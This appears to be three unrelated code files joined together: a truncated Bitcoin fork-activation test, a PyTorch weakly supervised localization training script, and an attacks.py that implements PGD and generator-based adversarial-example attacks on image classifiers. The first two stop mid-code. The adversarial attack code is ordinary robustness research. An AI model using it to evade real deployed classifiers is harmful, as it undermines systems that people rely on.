# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(100):
out.append(get_spendable_output())
# block up to LEGACY_MAX_BLOCK_SIZE are accepted.
block(1, spend=out[0], block_size=LEGACY_MAX_BLOCK_SIZE)
yield accepted()
# bigger block are reject as the fork isn't activated yet.
block(2, spend=out[1], block_size=LEGACY_MAX_BLOCK_SIZE + 1)
yield rejected(RejectResult(16, b'bad-blk-length'))
# Rewind bad block
tip(1)
# Create a transaction that we will use to test SIGHASH_FORID
script_forkid = CScript([self.forkid_pubkey, OP_CHECKSIG])
tx_forkid = self.create_and_sign_transaction(
out[1].tx, out[1].n, 1, script_forkid)
# Create a block that would activate the HF. We also add the
# transaction that will allow us to test SIGHASH_FORKID
b03 = block(3)
b03.nTime = UAHF_START_TIME
update_block(3, [tx_forkid])
yield accepted()
# Pile up 4 blocks on top to get to the point just before activation.
block(4, spend=out[2])
yield accepted()
block(5, spend=out[3])
yield accepted()
block(6, spend=out[4])
yield accepted()
block(7, spend=out[5])
yield accepted()
# bigger block are still rejected as the fork isn't activated yet.
block(8, spend=out[6], block_size=LEGACY_MAX_BLOCK_SIZE + 1)
yield rejected(RejectResult(16, b'bad-blk-length'))
# Rewind bad block
tip(7)
# build a transaction using SIGHASH_FORKID
tx_spend = self.create_tx(tx_forkid, 0, 1, CScript([OP_TRUE]))
sighash_spend = SignatureHashForkId(
script_forkid, tx_spend, 0, SIGHASH_FORKID | SIGHASH_ALL, 1)
sig_forkid = self.forkid_key.sign(sighash_spend)
tx_spend.vin[0].scriptSig = CScript(
[sig_forkid + bytes(bytearray([SIGHASH_FORKID | SIGHASH_ALL]))])
tx_spend.rehash()
# This transaction can't get into the mempool yet
try:
node.sendrawtransaction(ToHex(tx_spend))
except JSONRPCException as exp:
assert_equal(exp.error["message"], RPC_SIGHASH_FORKID_ERROR)
else:
assert(False)
# The transaction is rejected, so the mempool should still be empty
assert_equal(set(node.getrawmempool()), set())
# check that SIGHASH_FORKID transaction are still rejected
block(9)
update_block(9, [tx_spend])
yield rejected(RejectResult(16, SIGHASH_INVALID_ERROR))
# Rewind bad block
tip(7)
# Pile up another block, to activate. OP_RETURN anti replay
# outputs are still considered valid.
antireplay_script = CScript([OP_RETURN, ANTI_REPLAY_COMMITMENT])
block(10, spend=out[6], script=antireplay_script)
yield accepted()
# Now that the HF is activated, replay protected tx are
# accepted in the mempool
tx_spend_id = node.sendrawtransaction(ToHex(tx_spend))
assert_equal(set(node.getrawmempool()), {tx_spend_id})
# Mark the HF
self.uahfEnabled = True
# HF is active now, we MUST create a big block.
block(11, spend=out[7], block_size=LEGACY_MAX_BLOCK_SIZE)
yield rejected(RejectResult(16, b'bad-blk-too-small'))
# Rewind bad | |
<reponame>Aks-Dmv/WSDDN
import argparse
import os
import shutil
import time
import sys
import sklearn
import sklearn.metrics
import torch
torch.cuda.init()
import torch.nn as nn
import torch.nn.parallel
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from AlexNet import *
from voc_dataset import *
from utils import *
import wandb
USE_WANDB = True # use flags, wandb is not convenient for debugging
# Torchvision model constructors (lowercase callables) usable as --arch values.
model_names = sorted(name for name in models.__dict__
    if name.islower() and not name.startswith("__")
    and callable(models.__dict__[name]))
# Command line interface (mirrors the classic PyTorch ImageNet example).
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('--arch', default='localizer_alexnet')
parser.add_argument(
    '-j',
    '--workers',
    default=4,
    type=int,
    metavar='N',
    help='number of data loading workers (default: 4)')
parser.add_argument(
    '--epochs',
    default=30,
    type=int,
    metavar='N',
    help='number of total epochs to run')
parser.add_argument(
    '--start-epoch',
    default=0,
    type=int,
    metavar='N',
    help='manual epoch number (useful on restarts)')
parser.add_argument(
    '-b',
    '--batch-size',
    default=256,
    type=int,
    metavar='N',
    help='mini-batch size (default: 256)')
parser.add_argument(
    '--lr',
    '--learning-rate',
    default=0.1,
    type=float,
    metavar='LR',
    help='initial learning rate')
parser.add_argument(
    '--momentum', default=0.9, type=float, metavar='M', help='momentum')
parser.add_argument(
    '--weight-decay',
    '--wd',
    default=1e-4,
    type=float,
    metavar='W',
    help='weight decay (default: 1e-4)')
parser.add_argument(
    '--print-freq',
    '-p',
    default=10,
    type=int,
    metavar='N',
    help='print frequency (default: 10)')
parser.add_argument(
    '--eval-freq',
    default=2,
    type=int,
    metavar='N',
    help='print frequency (default: 10)')
parser.add_argument(
    '--resume',
    default='',
    type=str,
    metavar='PATH',
    help='path to latest checkpoint (default: none)')
parser.add_argument(
    '-e',
    '--evaluate',
    dest='evaluate',
    action='store_true',
    help='evaluate model on validation set')
parser.add_argument(
    '--pretrained',
    dest='pretrained',
    action='store_true',
    help='use pre-trained model')
parser.add_argument(
    '--world-size',
    default=1,
    type=int,
    help='number of distributed processes')
parser.add_argument(
    '--dist-url',
    default='tcp://172.16.31.10:23456',
    type=str,
    help='url used to set up distributed training')
parser.add_argument(
    '--dist-backend', default='gloo', type=str, help='distributed backend')
parser.add_argument('--vis', action='store_true')
# Global state shared between main/train/validate: best validation score so
# far, and monotonically increasing wandb step counters.
best_prec1 = 0
cntr_train = 0
cntr_val = 0
def main():
    """Entry point: build the localizer model, data loaders, then train/evaluate.

    Parses CLI args, constructs a (DataParallel, CUDA) localizer AlexNet,
    optionally resumes from a checkpoint, and either runs a single validation
    pass (--evaluate) or the full train/validate loop with checkpointing.
    """
    global args, best_prec1, cntr_train, cntr_val
    args = parser.parse_args()
    args.distributed = args.world_size > 1
    # create model
    print("=> creating model '{}'".format(args.arch))
    if args.arch == 'localizer_alexnet':
        model = localizer_alexnet(pretrained=args.pretrained)
    elif args.arch == 'localizer_alexnet_robust':
        model = localizer_alexnet_robust(pretrained=args.pretrained)
    print(model)
    model = torch.nn.DataParallel(model)
    model.cuda()
    # TODO:
    # define loss function (criterion) and optimizer
    # also use an LR scheduler to decay LR by 10 every 30 epochs
    # you can also use PlateauLR scheduler, which usually works well
    criterion = nn.BCEWithLogitsLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
    # NOTE(review): the scheduler is created but never stepped (the
    # step call below is commented out) - confirm this is intentional.
    training_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')
    # optionally resume from a checkpoint
    if args.resume:
        if os.path.isfile(args.resume):
            print("=> loading checkpoint '{}'".format(args.resume))
            checkpoint = torch.load(args.resume)
            args.start_epoch = checkpoint['epoch']
            best_prec1 = checkpoint['best_prec1']
            model.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            print("=> loaded checkpoint '{}' (epoch {})".format(
                args.resume, checkpoint['epoch']))
        else:
            print("=> no checkpoint found at '{}'".format(args.resume))
    cudnn.benchmark = True
    # Data loading code
    #TODO: Create Datasets and Dataloaders using VOCDataset - Ensure that the sizes are as required
    # Also ensure that data directories are correct - the ones use for testing by TAs might be different
    # Resize the images to 512x512
    train_dataset = VOCDataset(image_size=512)
    val_dataset = VOCDataset(split='test', image_size=512)
    # Keep samples as tuples-of-tuples instead of stacked tensors; the
    # stacking happens inside train()/validate().
    def collate_fn(batch):
        return tuple(zip(*batch))
    train_sampler = None
    # NOTE(review): the training loader is NOT shuffled (shuffle=False, and
    # the shuffled variant is commented out) - confirm this is deliberate.
    train_loader = torch.utils.data.DataLoader(
        train_dataset,
        batch_size=args.batch_size,
        # shuffle=(train_sampler is None),
        shuffle=False,
        num_workers=args.workers,
        pin_memory=True,
        sampler=train_sampler,
        drop_last=True, collate_fn=collate_fn)
    val_loader = torch.utils.data.DataLoader(
        val_dataset,
        batch_size=args.batch_size,
        shuffle=False,
        num_workers=args.workers,
        pin_memory=True,
        drop_last=True, collate_fn=collate_fn)
    if args.evaluate:
        validate(val_loader, model, criterion)
        return
    # TODO: Create loggers for wandb - ideally, use flags since wandb makes it harder to debug code.
    if USE_WANDB:
        wandb.init(project="vlr2", reinit=True)
    for epoch in range(args.start_epoch, args.epochs):
        # adjust_learning_rate(optimizer, epoch)
        # train for one epoch
        loss = train(train_loader, model, criterion, optimizer, epoch)
        # training_scheduler.step(loss)
        # evaluate on validation set
        if epoch % args.eval_freq == 0 or epoch == args.epochs - 1:
            m1, m2 = validate(val_loader, model, criterion, epoch)
            # Model selection uses the product of the two metrics.
            score = m1 * m2
            # remember best prec@1 and save checkpoint
            is_best = score > best_prec1
            best_prec1 = max(score, best_prec1)
            save_checkpoint({
                'epoch': epoch + 1,
                'arch': args.arch,
                'state_dict': model.state_dict(),
                'best_prec1': best_prec1,
                'optimizer': optimizer.state_dict(),
            }, is_best)
#TODO: You can add input arguments if you wish
def train(train_loader, model, criterion, optimizer, epoch):
    """Train for one epoch; returns the detached loss of the *last* batch.

    Each batch is a tuple from collate_fn: data[0]=images, data[1]=multi-label
    targets, data[2]=per-class weights. The class heatmap emitted by the model
    is global-max-pooled to one score per class before the weighted BCE loss.
    """
    global cntr_train
    batch_time = AverageMeter()
    data_time = AverageMeter()
    losses = AverageMeter()
    avg_m1 = AverageMeter()
    avg_m2 = AverageMeter()
    # switch to train mode
    model.train()
    end = time.time()
    for i, (data) in enumerate(train_loader):
        # measure data loading time
        data_time.update(time.time() - end)
        # TODO: Get inputs from the data dict
        # TODO: Get output from model
        # TODO: Perform any necessary functions on the output such as clamping
        # TODO: Compute loss using ``criterion``
        img_input = torch.stack(data[0], dim=0).cuda()
        target = torch.stack(data[1], dim=0).cuda()
        wgt = torch.stack(data[2], dim=0).cuda()
        # TODO: Get output from model
        # TODO: Perform any necessary functions on the output such as clamping
        # TODO: Compute loss using ``criterion``
        optimizer.zero_grad()
        output_heatmap = model(img_input)
        if args.arch == 'localizer_alexnet':
            # Global max-pool: kernel spans the whole spatial map.
            max_pool_k = output_heatmap.shape[2]
            maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
            output = maxPool(output_heatmap)
        elif args.arch == 'localizer_alexnet_robust':
            # Robust variant returns three heatmaps at different scales;
            # each is max-pooled separately then blended.
            max_pool_k = output_heatmap[0].shape[2]
            maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
            output = maxPool(output_heatmap[0])
            max_pool_k1 = output_heatmap[1].shape[2]
            maxPool1 = nn.MaxPool2d(kernel_size=max_pool_k1)
            output_1 = maxPool1(output_heatmap[1])
            max_pool_k2 = output_heatmap[2].shape[2]
            maxPool2 = nn.MaxPool2d(kernel_size=max_pool_k2)
            output_2 = maxPool2(output_heatmap[2])
            # NOTE(review): 0.333 * 3 = 0.999, presumably intended as a 1/3
            # average over the three scales - confirm intent.
            output = output*0.333 + output_1*0.333 + output_2*0.333
        output = output.view(output.shape[0], output.shape[1])
        # Weighted BCE-with-logits: wgt masks out difficult/ignored classes.
        loss = criterion(output*wgt, target*wgt)
        # measure metrics and record loss
        sigmoid = nn.Sigmoid()
        m1 = metric1(sigmoid(output), target, wgt)
        m2 = metric2(sigmoid(output), target, wgt)
        losses.update(loss.item(), img_input.size(0))
        avg_m1.update(m1)
        avg_m2.update(m2)
        # TODO:
        # compute gradient and do SGD step
        loss.backward()
        optimizer.step()
        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()
        if i % args.print_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Metric1 {avg_m1.val:.3f} ({avg_m1.avg:.3f})\t'
                  'Metric2 {avg_m2.val:.3f} ({avg_m2.avg:.3f})'.format(
                      epoch,
                      i,
                      len(train_loader),
                      batch_time=batch_time,
                      data_time=data_time,
                      loss=losses,
                      avg_m1=avg_m1,
                      avg_m2=avg_m2))
        #TODO: Visualize/log things as mentioned in handout
        #TODO: Visualize at appropriate intervals
        if USE_WANDB and i % args.print_freq == 0:
            wandb.log({"train/loss": loss, "train/cntr":cntr_train})
            wandb.log({"train/m1": m1, "train/cntr":cntr_train})
            wandb.log({"train/m2": m2, "train/cntr":cntr_train})
            cntr_train+=1
    # End of train()
    return loss.detach()
def validate(val_loader, model, criterion, epoch = 0):
    """Evaluate on the validation set; returns (avg metric1, avg metric2).

    Mirrors the forward pass in train() (global max-pool over the class
    heatmap, weighted BCE loss) and periodically logs heatmap visualisations
    of ground-truth classes to wandb.
    NOTE(review): there is no torch.no_grad() wrapper here, so autograd state
    is tracked during evaluation - consider adding one.
    """
    global cntr_val
    batch_time = AverageMeter()
    losses = AverageMeter()
    avg_m1 = AverageMeter()
    avg_m2 = AverageMeter()
    # switch to evaluate mode
    model.eval()
    end = time.time()
    for i, (data) in enumerate(val_loader):
        # TODO: Get inputs from the data dict
        img_input = torch.stack(data[0], dim=0).cuda()
        target = torch.stack(data[1], dim=0).cuda()
        wgt = torch.stack(data[2], dim=0).cuda()
        # TODO: Get output from model
        # TODO: Perform any necessary functions on the output
        # TODO: Compute loss using ``criterion``
        output_heatmap = model(img_input)
        if args.arch == 'localizer_alexnet':
            # Global max-pool the class heatmap to one score per class.
            max_pool_k = output_heatmap.shape[2]
            maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
            output = maxPool(output_heatmap)
        elif args.arch == 'localizer_alexnet_robust':
            max_pool_k = output_heatmap[0].shape[2]
            maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
            output = maxPool(output_heatmap[0])
            max_pool_k1 = output_heatmap[1].shape[2]
            maxPool1 = nn.MaxPool2d(kernel_size=max_pool_k1)
            output_1 = maxPool1(output_heatmap[1])
            max_pool_k2 = output_heatmap[2].shape[2]
            maxPool2 = nn.MaxPool2d(kernel_size=max_pool_k2)
            output_2 = maxPool2(output_heatmap[2])
            # NOTE(review): 0.333 * 3 = 0.999 - presumably a 1/3 average.
            output = output*0.333 + output_1*0.333 + output_2*0.333
        output = output.view(output.shape[0], output.shape[1])
        loss = criterion(output*wgt, target*wgt)
        sigmoid = nn.Sigmoid()
        # measure metrics and record loss
        m1 = metric1(sigmoid(output), target, wgt)
        m2 = metric2(sigmoid(output), target, wgt)
        losses.update(loss.item(), img_input.size(0))
        avg_m1.update(m1)
        avg_m2.update(m2)
        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()
        if i % args.print_freq == 0:
            print('Test: [{0}/{1}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Metric1 {avg_m1.val:.3f} ({avg_m1.avg:.3f})\t'
                  'Metric2 {avg_m2.val:.3f} ({avg_m2.avg:.3f})'.format(
                      i,
                      len(val_loader),
                      batch_time=batch_time,
                      loss=losses,
                      avg_m1=avg_m1,
                      avg_m2=avg_m2))
        #TODO: Visualize things as mentioned in handout
        #TODO: Visualize at appropriate intervals
        if USE_WANDB:
            if i % args.print_freq == 0:
                wandb.log({"val/loss": loss, "val/cntr":cntr_val})
                wandb.log({"val/m1": m1, "val/cntr":cntr_val})
                wandb.log({"val/m2": m2, "val/cntr":cntr_val})
                cntr_val+=1
            # Visualise heatmaps of the first few images every 14th epoch.
            if i<5 and epoch%14==0:
                # Channel-mean of the input image as a grayscale reference.
                gt_np_img = img_input[0].detach().cpu().numpy().mean(axis=0)
                wandb.log({'heatmaps/epoch_{}_gt_img_{}'.format(epoch, i): wandb.Image(gt_np_img)})
                weighted_target = (target[0] * wgt[0]).detach().cpu().numpy()
                heat_i = 0
                resize512 = transforms.Resize((512, 512))
                for class_i in range(20):
                    print(weighted_target[class_i])
                    # Only log heatmaps for classes present in the image.
                    if weighted_target[class_i]==1:
                        target_gt = class_i
                    else:
                        continue
                    if args.arch == 'localizer_alexnet':
                        print("output heatmap shape ", output_heatmap.shape)
                        print(torch.sum(torch.isnan(output_heatmap[0,target_gt]).type(torch.uint8)))
                        out_heat = resize512(output_heatmap[0,target_gt][None,:,:])
                        selected_heatmap = out_heat.detach().cpu()
                        # selected_heatmap = selected_heatmap[None,:,:]
                    elif args.arch == 'localizer_alexnet_robust':
                        print("output heatmap shape ", output_heatmap[0].shape, output_heatmap[1].shape, output_heatmap[2].shape)
                        # print(torch.sum(torch.isnan(output_heatmap[0][0,target_gt]).type(torch.uint8)))
                        out_heat = resize512(output_heatmap[0][0,target_gt][None,:,:]) * 0.333
                        out_heat1 = resize512(output_heatmap[1][0,target_gt][None,:,:]) * 0.333
                        out_heat2 = resize512(output_heatmap[2][0,target_gt][None,:,:]) * 0.333
                        selected_heatmap = out_heat + out_heat1 + out_heat2
                        selected_heatmap = selected_heatmap.detach().cpu()
                    print("target gt", target_gt)
                    selected_heatmap = resize512(selected_heatmap)
                    selected_heatmap = torch.permute(selected_heatmap, (1,2,0)).numpy()
                    print(selected_heatmap.min())
                    print(selected_heatmap.max())
                    wandb.log({'heatmaps/epoch_{}_img_{}_heatmap_{}'.format(epoch, i, target_gt): wandb.Image(selected_heatmap)})
    print(' * Metric1 {avg_m1.avg:.3f} Metric2 {avg_m2.avg:.3f}'.format(
        avg_m1=avg_m1, avg_m2=avg_m2))
    return avg_m1.avg, avg_m2.avg
# TODO: You can make changes to this function if you wish (not necessary)
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
    """Serialize *state* to *filename*; mirror it to 'model_best.pth.tar' when best."""
    torch.save(state, filename)
    if not is_best:
        return
    shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
    """Tracks the most recent value plus a running (count-weighted) average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Zero out every statistic."""
        self.val = self.avg = self.sum = self.count = 0

    def update(self, val, n=1):
        """Fold in *val* observed *n* times and refresh the running average."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count
def metric1(pred, gt, valid):
# TODO: Ignore for now - proceed till instructed
pred = torch.sigmoid(pred).cpu().detach().numpy()
| |
<filename>attacks.py
from PIL import Image
from torchvision import transforms
import torch
from models import *
from torch import nn, optim
from torchvision.models import resnet50
from torchvision.models.vgg import VGG
import torchvision.models.densenet as densenet
import torchvision.models.alexnet as alexnet
from torchvision.utils import save_image
import torch.nn.functional as F
from advertorch.utils import batch_multiply
from advertorch.utils import batch_clamp
from advertorch.utils import clamp
from torch import optim
from torch.autograd import Variable
import json
import os
import numpy as np
import argparse
from tqdm import tqdm
from utils import *
import ipdb
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
def whitebox_pgd(args, model):
    """Run an untargeted L2 PGD attack over the CIFAR-10 training set.

    Builds an advertorch L2PGDAttack adversary, perturbs every training
    image, and prints the model's accuracy on the adversarial examples.
    """
    adversary = L2PGDAttack(
        model, loss_fn=nn.CrossEntropyLoss(reduction="sum"), eps=0.3,
        nb_iter=40, eps_iter=0.01, rand_init=True, clip_min=-1.0, clip_max=1.0,
        targeted=False)
    transform_train = transforms.Compose([
        transforms.RandomCrop(32, padding=4),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
    ])
    trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
                                            download=True, transform=transform_train)
    train_loader = torch.utils.data.DataLoader(trainset, batch_size=1,
                                               shuffle=True, num_workers=8)
    train_itr = tqdm(enumerate(train_loader), total=len(train_loader.dataset))
    correct = 0
    for batch_idx, (data, target) in train_itr:
        x, target = data.to(args.device), target.to(args.device)
        adv_image = adversary.perturb(x, target)
        pred = model(adv_image)
        out = pred.max(1, keepdim=True)[1]  # get the index of the max log-probability
        # BUG FIX: the original accumulated the raw ``eq`` tensor
        # (``correct += out.eq(...)``), which only worked by accident with
        # batch_size=1 and made ``acc`` an ndarray. Reduce to a Python int
        # so any batch size works and acc is a plain float.
        correct += out.eq(target.unsqueeze(1).data).sum().item()
    acc = 100. * correct / len(train_loader.dataset)
    # NOTE(review): ``acc`` is the model's accuracy on adversarial inputs,
    # i.e. the attack *failure* rate, despite the message wording.
    print("PGD attack succes rate %f" %(acc))
def white_box_untargeted(args, image, target, model, enc=None, dec=None, \
        vae=None, ae= None, normalize=None):
    """Untargeted PGD attack on *image*; returns (final prediction, delta).

    Optimises an additive perturbation ``delta`` (clipped to the l-inf ball of
    radius 0.3 and to valid pixel range) for args.PGD_steps sign-gradient steps.
    If a VAE/AE is given, the input is passed through it before classification.
    NOTE(review): in the VAE path ``x`` is re-encoded every iteration
    (x is reassigned from its own reconstruction), so reconstructions
    compound across steps - confirm this is intended.
    NOTE(review): the VAE path assumes 1x28x28 (MNIST-shaped) inputs.
    """
    epsilon = 0.3
    # Create noise vector
    delta = torch.zeros_like(image,requires_grad=True).to(args.device)
    # Optimize noise vector (only) to fool model
    x = image
    use_vae = True if (vae is not None) else False
    use_ae = True if (ae is not None) else False
    print("Target is %d" %(target))
    for t in range(args.PGD_steps):
        if normalize is not None:
            if use_vae:
                x = x.view(x.size(0), -1).unsqueeze(0)
                z, mu, logvar = vae(x)
                z = z.clamp(0, 1)
                x = z.view(z.size(0), 1, 28, 28)
            elif use_ae:
                x = ae(x)
            pred = model(normalize(x + delta))
        else:
            if use_vae:
                x = x.view(x.size(0), -1).unsqueeze(0)
                z, mu, logvar = vae(x)
                z = z.clamp(0, 1)
                x = z.view(z.size(0), 1, 28, 28)
            elif use_ae:
                x = ae(x)
            pred = model(x.detach() + delta)
        # Prediction on the clean reconstruction, for logging comparison.
        recon_pred = model(x.detach())
        out = pred.max(1, keepdim=True)[1]  # get the index of the max log-probability
        recon_out = recon_pred.max(1, keepdim=True)[1]  # get the index of the max log-probability
        # Untargeted: ascend the CE loss w.r.t. the true target.
        loss = nn.CrossEntropyLoss(reduction="sum")(pred, target)
        recon_image = (x)[0].detach()
        if args.comet:
            args.experiment.log_metric("Whitebox CE loss",loss,step=t)
            plot_image_to_comet(args,recon_image,"recon.png")
        if t % 5 == 0:
            print(t, out[0][0], recon_out[0][0], loss.item())
        loss.backward()
        grad_sign = delta.grad.data.sign()
        delta.data = delta.data + batch_multiply(0.01, grad_sign)
        # Clipping is equivalent to projecting back onto the l_\infty ball
        # This technique is known as projected gradient descent (PGD)
        delta.data.clamp_(-epsilon, epsilon)
        delta.data = clamp(x.data + delta.data,0.,1.) - x.data
        delta.grad.data.zero_()
        # if out != target:
            # print(t, out[0][0], loss.item())
            # break
    if args.comet:
        if not args.mnist:
            clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
            adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
            delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
        else:
            clean_image = (image)[0].detach()
            adv_image = (x + delta)[0].detach()
            recon_image = (x)[0].detach()
            delta_image = (delta)[0].detach().cpu()
        plot_image_to_comet(args,clean_image,"clean.png")
        plot_image_to_comet(args,adv_image,"Adv.png")
        plot_image_to_comet(args,delta_image,"delta.png")
        plot_image_to_comet(args,recon_image,"recon.png")
    return out, delta
def single_white_box_generator(args, image, target, model, G):
    """Craft an adversarial perturbation for one image by optimizing the
    generator ``G``'s weights (white-box attack).

    Unlike classic PGD, the update is applied to G's parameters (signed
    gradients + SGD) rather than to the perturbation tensor; ``delta`` is
    re-sampled from G at every step.

    Args:
        args:   namespace with ``PGD_steps`` and ``comet``/``mnist`` flags.
        image:  clean input image tensor.
        target: label tensor (printed as an int, so batch size 1 is assumed).
        model:  classifier under attack.
        G:      generator returning (delta, kl_div) for an input image.

    Returns:
        (out, delta): final predicted label and final perturbation.
    """
    epsilon = 0.5
    # Create noise vector
    x = image
    opt = optim.SGD(G.parameters(), lr=1e-2)
    print("Target is %d" %(target))
    for t in range(args.PGD_steps):
        delta, kl_div = G(x)
        # reshape to MNIST image layout (hard-coded 1x28x28)
        delta = delta.view(delta.size(0), 1, 28, 28)
        # project delta onto the l_inf ball, then keep x+delta in [0, 1]
        delta.data.clamp_(-epsilon, epsilon)
        delta.data = clamp(x.data + delta.data,0.,1.) - x.data
        pred = model(x.detach() + delta)
        out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
        # negated CE: minimizing this loss maximizes the classifier's error
        loss = -nn.CrossEntropyLoss(reduction="sum")(pred, target)
        if args.comet:
            args.experiment.log_metric("Whitebox CE loss",loss,step=t)
        if t % 5 == 0:
            print(t, out[0][0], loss.item())
        opt.zero_grad()
        loss.backward()
        # replace gradients by their sign (FGSM-style update on G's weights)
        for p in G.parameters():
            p.grad.data.sign_()
        # Clipping is equivalent to projecting back onto the l_\infty ball
        # This technique is known as projected gradient descent (PGD)
        # delta.data.clamp_(-epsilon, epsilon)
        # delta.data = clamp(x.data + delta.data,0.,1.) - x.data
        opt.step()
        # stop as soon as the classifier is fooled (assumes batch size 1)
        if out != target:
            print(t, out[0][0], loss.item())
            break
    if args.comet:
        # CHW -> HWC transpose for plotting multi-channel (non-MNIST) images
        if not args.mnist:
            clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
            adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
            delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
        else:
            clean_image = (image)[0].detach()
            adv_image = (x + delta)[0].detach()
            delta_image = (delta)[0].detach()
        plot_image_to_comet(args,clean_image,"clean.png")
        plot_image_to_comet(args,adv_image,"Adv.png")
        plot_image_to_comet(args,delta_image,"delta.png")
    return out, delta
def PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
    """Evaluate a generator-based attack, drawing 10 perturbations per batch.

    Reports two numbers: standard accuracy (from the last sampled
    perturbation of each batch) and accuracy averaged over all 10 sampled
    perturbations per batch.

    Args:
        args: namespace with device, epsilon, vanilla_G, comet, mnist and
              test_batch_size settings.
        epoch: current epoch (kept for interface parity with the other
               test routines).
        test_loader: evaluation DataLoader.
        model: classifier under attack.
        G: perturbation generator; returns (delta, kl_div) unless
           args.vanilla_G is set.
        nc, h, w: channels/height/width used to reshape delta.
    """
    epsilon = args.epsilon
    test_itr = tqdm(enumerate(test_loader),\
            total=len(test_loader.dataset)/args.test_batch_size)
    correct_test = 0
    correct_batch_avg_list = []
    for batch_idx, (data, target) in test_itr:
        x, target = data.to(args.device), target.to(args.device)
        correct_batch_avg = 0
        for t in range(10):
            if not args.vanilla_G:
                delta, kl_div = G(x)
            else:
                delta = G(x)
            delta = delta.view(delta.size(0), nc, h, w)
            # Clipping is equivalent to projecting back onto the l_\infty ball
            # This technique is known as projected gradient descent (PGD)
            delta.data.clamp_(-epsilon, epsilon)
            delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
            pred = model(x.detach() + delta)
            out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
            # BUG FIX: accumulate the correct count over the 10 samples;
            # previously the count was overwritten on every iteration.
            correct_batch_avg += out.eq(target.unsqueeze(1).data).sum()
        # average over the 10 samples, once per batch (not per sample)
        correct_batch_avg = correct_batch_avg / (10*len(x))
        correct_batch_avg_list.append(correct_batch_avg)
        # standard accuracy uses only the last sampled perturbation
        correct_test += out.eq(target.unsqueeze(1).data).sum()
    # BUG FIX: average the per-batch list; the original called
    # sum() on the scalar correct_batch_avg instead of the list.
    batch_avg = sum(correct_batch_avg_list) / len(correct_batch_avg_list)
    print('\nTest set: Accuracy: {}/{} ({:.0f}%) | Multiple Samples Accuracy{:.0f}\n'\
            .format(correct_test, len(test_loader.dataset),\
                100. * correct_test / len(test_loader.dataset), batch_avg))
    if args.comet:
        if not args.mnist:
            index = np.random.choice(len(x) - 64, 1)[0]
            clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
            adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
            delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
        else:
            clean_image = (x)[0].detach()
            adv_image = (x + delta)[0].detach()
            delta_image = (delta)[0].detach()
        plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
        plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
        plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def PGD_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
    """Testing phase: classifier accuracy under one generator perturbation
    per batch, with optional image logging to comet."""
    epsilon = args.epsilon
    progress = tqdm(enumerate(test_loader),\
            total=len(test_loader.dataset)/args.test_batch_size)
    n_correct = 0
    for batch_idx, (data, target) in progress:
        x, target = data.to(args.device), target.to(args.device)
        # for t in range(args.PGD_steps):
        # draw one perturbation from the generator
        if args.vanilla_G:
            delta = G(x)
        else:
            delta, kl_div = G(x)
        delta = delta.view(delta.size(0), nc, h, w)
        # Clipping is equivalent to projecting back onto the l_\infty ball
        # This technique is known as projected gradient descent (PGD)
        delta.data.clamp_(-epsilon, epsilon)
        delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
        pred = model(x.detach() + delta)
        out = pred.max(1, keepdim=True)[1]  # index of the max log-probability
        n_correct += out.eq(target.unsqueeze(1).data).sum()
    print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
            .format(n_correct, len(test_loader.dataset),\
                100. * n_correct / len(test_loader.dataset)))
    if args.comet:
        # log a sample of clean / adversarial / perturbation images
        if args.mnist:
            clean_image = x[0].detach()
            adv_image = (x + delta)[0].detach()
            delta_image = delta[0].detach()
        else:
            index = np.random.choice(len(x) - 64, 1)[0]
            clean_image = x[index:index+64].detach()
            adv_image = (x + delta)[index:index+64].detach()
            delta_image = delta[index:index+64].detach()
        for img, fname in ((clean_image, "clean.png"),
                           (adv_image, "Adv.png"),
                           (delta_image, "delta.png")):
            plot_image_to_comet(args, img, fname, normalize=True)
